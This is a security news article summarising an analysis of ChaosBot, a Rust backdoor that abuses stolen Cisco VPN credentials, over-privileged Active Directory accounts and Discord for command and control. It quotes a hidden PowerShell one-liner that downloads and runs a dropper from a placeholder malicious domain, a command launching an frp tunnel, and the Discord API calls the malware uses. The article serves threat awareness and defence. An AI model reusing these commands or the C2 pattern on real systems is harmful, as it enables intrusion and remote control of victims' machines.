Cyber Security News

New Chaosbot Leveraging CiscoVPN and Active Directory Passwords to Execute Network Commands

ChaosBot surfaced in late September 2025 as a sophisticated Rust-based backdoor targeting enterprise networks. Initial investigations revealed that threat actors gained entry by exploiting compromised CiscoVPN credentials coupled with over-privileged Active Directory service accounts.

Once inside, ChaosBot was stealthily deployed via side-loading techniques using the legitimate Microsoft Edge component identity_helper.exe from the C:\Users\Public\Libraries directory.

The malware’s Rust implementation and reliance on Discord for its command and control (C2) operations underscore an innovative blend of modern development practices and misappropriated mainstream services.

eSentire analysts noted that the threat actor behind ChaosBot operated through a Discord profile named “chaos_00019,” suggesting a deliberate attempt to mask communications within popular social platforms.

Victim demographics indicate a focus on Vietnamese-speaking environments, although lateral movement experiments on differing targets have been observed.

Attack Chain (Source – eSentire)

The combination of VPN credential abuse and over-privileged AD accounts enabled seamless WMI-based remote execution, facilitating widespread deployment before detection.

Following initial compromise, ChaosBot conducts reconnaissance and establishes a fast reverse proxy (frp) tunnel to maintain persistent access.

The malware downloads frp and its configuration file (node.ini) into C:\Users\Public\Music, then launches the proxy via a PowerShell-executed shell command:-

powershell -Command "$OutputEncoding = [System.Text.Encoding]::UTF8; C:\Users\Public\Music\node.exe -c C:\Users\Public\Music\node.ini"

This sequence creates a hidden communication channel over port 7000 to a remote AWS host, bypassing perimeter defenses and supporting subsequent lateral movements.

Infection Mechanism

The core infection mechanism of ChaosBot leverages two primary vectors: credential-based access and malicious Windows shortcuts.

In the former, valid CiscoVPN credentials and an over-privileged AD account named “serviceaccount” are used to run WMI commands that drop and execute the ChaosBot payload (msedge_elf.dll) on remote hosts.

The shortcut vector involves phishing emails containing .lnk files that execute a PowerShell one-liner to fetch and launch ChaosBot while opening a decoy PDF themed after the State Bank of Vietnam to distract the user.

PowerShell-based malicious shortcut (Source – eSentire)

This PowerShell command resembles:

powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://malicious-domain/dropper.exe' -OutFile $env:Temp\chaosbot.exe; Start-Process $env:Temp\chaosbot.exe"

Upon execution, ChaosBot validates its embedded Discord bot token with a GET request to https://discord.com/api/v10/users/@me, then creates a dedicated channel named after the victim’s hostname using a POST to https://discord.com/api/v10/guilds/<GUILD_ID>/channels.

Subsequent shell commands fetched from Discord messages are executed in new PowerShell processes prefixed with UTF-8 encoding directives to preserve output integrity.

Results, including stdout, stderr, screenshots, or file attachments, are returned to the threat actor’s Discord channel via multipart/form-data POST requests.

This dual-vector approach—credential exploitation and social engineering using malicious shortcuts—combined with the use of legitimate services for C2, makes ChaosBot particularly challenging to detect and remediate.

Asset masquerading through built-in Windows binaries and rigorous encoding practices further obscure its presence within targeted environments.

Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.

Recent Posts

Threat Actors Exploiting SonicWall SSL VPN Devices in Wild to Deploy Akira Ransomware

Threat actors have reemerged in mid-2025 leveraging previously disclosed vulnerabilities in SonicWall SSL VPN appliances…

3 hours ago

Nanoprecise partners with AccuKnox to strengthen its Zero Trust Cloud Security and Compliance Posture

Menlo Park, USA, October 10th, 2025, CyberNewsWire AccuKnox, a leader in Zero Trust Cloud Native…

3 hours ago

175 Malicious npm Packages With 26,000 Downloads Attacking Technology, and Energy Companies Worldwide

Socket's Threat Research Team has uncovered a sophisticated phishing campaign involving 175 malicious npm packages…

4 hours ago

RondoDox Botnet Exploits 50+ Vulnerabilities to Attack Routers, CCTV Systems and Web Servers

Since its emergence in early 2025, RondoDox has rapidly become one of the most pervasive…

5 hours ago

Microsoft Defender Incorrectly Flags SQL Server Software as End-of-life

Microsoft Defender for Endpoint is incorrectly flagging specific versions of SQL Server as having reached…

6 hours ago

Critical GitHub Copilot Vulnerability Let Attackers Exfiltrate Source Code From Private Repos

A critical vulnerability in GitHub Copilot Chat, rated 9.6 on the CVSS scale, could have…

7 hours ago